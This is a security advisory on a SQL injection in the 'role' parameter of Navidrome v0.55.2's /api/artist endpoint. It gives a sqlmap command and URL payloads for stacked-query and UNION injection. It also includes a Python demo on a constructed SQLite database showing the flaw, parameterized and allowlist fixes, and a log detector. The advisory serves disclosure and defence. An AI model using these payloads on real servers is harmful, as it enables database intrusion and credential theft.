
# 🛡 Security Advisory: SQL Injection Vulnerability in Navidrome v0.55.2

## Overview

This vulnerability arises from improper input validation of the `role` parameter on the API endpoint `/api/artist`. The value is incorporated into the SQL query without sanitisation or parameter binding, so an attacker can inject arbitrary SQL, potentially gaining unauthorized access to the backend database and compromising sensitive user information.

## Details

- Vulnerable component: API endpoint `/api/artist`
- Parameter: `role`
- Vulnerability type: SQL injection (stacked queries, UNION queries)
- Database affected: SQLite (exploitation confirmed with SQLite-specific payloads)

## Impact

Successful exploitation allows an unauthenticated attacker to:

- execute arbitrary SQL statements;
- extract or manipulate sensitive data (e.g. user records, playlists);
- potentially escalate privileges or disrupt service availability.

## Proof of Concept (PoC)

Example sqlmap invocation (`navi` is a saved HTTP request to the endpoint):

```bash
sqlmap.py -r navi --level 5 --risk 3 -a --banner --batch --tamper charencode --dbms sqlite
```

Sample payloads:

Stacked queries. The injected second statement makes SQLite build a large random blob; the resulting delay confirms that the appended statement executed (a sqlmap-style heavy-query probe):

```
https://navidrome/api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist');SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))--
```

UNION-based query:

```
https://navidrome.local/api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist') UNION ALL SELECT…
```
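The following is an added example, not Navidrome's code, showing the root cause described above against a SQLite database and the two fixes a reviewer would ask for: binding the `role` value as a query parameter, and rejecting any `role` outside an allowlist, since the parameter is an enum rather than free text. It also includes a small log check that flags `/api/artist` requests whose `role` value is not an allowed role. The table schema, the role allowlist, the UNION payload and the access-log format are all constructed for this example. The demonstration uses the UNION form because Python's `sqlite3` driver refuses more than one statement per `execute()` call; whether stacked queries work in a given application depends on its database driver, and the advisory reports that they do here.

```python
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Constructed schema and rows standing in for the kind of tables a Navidrome-like
# SQLite database holds (an assumption; not Navidrome's real schema).
SCHEMA = """
CREATE TABLE artist (id TEXT PRIMARY KEY, name TEXT NOT NULL, role TEXT NOT NULL);
CREATE TABLE user (id TEXT PRIMARY KEY, user_name TEXT NOT NULL, password TEXT NOT NULL);
INSERT INTO artist VALUES ('a1', 'Alice', 'albumartist'), ('a2', 'Bob', 'artist');
INSERT INTO user VALUES ('u1', 'admin', 'hunter2');
"""

# Roles the hypothetical endpoint is meant to accept (assumption).
ALLOWED_ROLES = frozenset({"artist", "albumartist", "composer"})

# Constructed UNION payload in the shape the advisory shows: close the "('" that
# wraps the role value, append a UNION, and comment out the rest of the query.
UNION_PAYLOAD = "albumartist') UNION ALL SELECT user_name || ':' || password FROM user--"


def open_db():
    """In-memory SQLite database seeded with the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def list_artists_vulnerable(conn, role):
    """The flawed pattern: the caller-controlled role is spliced into the SQL text."""
    sql = f"SELECT name FROM artist WHERE (role = '{role}') ORDER BY name"
    return [row[0] for row in conn.execute(sql)]


def list_artists_parameterized(conn, role):
    """Fix 1: bind the value. SQLite compares it as a string, never parses it as SQL."""
    sql = "SELECT name FROM artist WHERE (role = ?) ORDER BY name"
    return [row[0] for row in conn.execute(sql, (role,))]


def validate_role(role):
    """Fix 2 (defence in depth): role is an enum, so reject anything off the allowlist."""
    return role in ALLOWED_ROLES


def suspicious_role_requests(log_lines):
    """Detection: flag /api/artist requests whose role value is not an allowed role.

    Expects the request target as the second whitespace-separated field of each
    line (the constructed log format used in SAMPLE_LOG below).
    """
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        target = parts[1]
        url = urlsplit(target)
        if url.path != "/api/artist":
            continue
        # parse_qs percent-decodes, so encoded quotes and spaces are restored.
        for role in parse_qs(url.query).get("role", []):
            if not validate_role(role):
                hits.append((target, role))
    return hits


# Constructed access-log lines (not real Navidrome logs): a benign request,
# the URL-encoded UNION payload, and a request to a different endpoint.
SAMPLE_LOG = [
    "GET /api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist 200",
    "GET /api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist%27%29%20UNION%20ALL"
    "%20SELECT%20user_name%20%7C%7C%20%27%3A%27%20%7C%7C%20password%20FROM%20user-- 200",
    "GET /api/album?_end=15&role=anything 200",
]


if __name__ == "__main__":
    db = open_db()
    print("vulnerable    :", list_artists_vulnerable(db, UNION_PAYLOAD))
    print("parameterized :", list_artists_parameterized(db, UNION_PAYLOAD))
    print("allowlist ok  :", validate_role(UNION_PAYLOAD))
    print("log hits      :", suspicious_role_requests(SAMPLE_LOG))
```

Running the script shows the vulnerable function returning the `user` row alongside the artist names, while the parameterized function returns nothing for the same input because the whole payload is compared as a literal role name. Parameter binding is the fix; the allowlist is cheap defence in depth that also gives the detection function a precise signal without any pattern matching on SQL keywords.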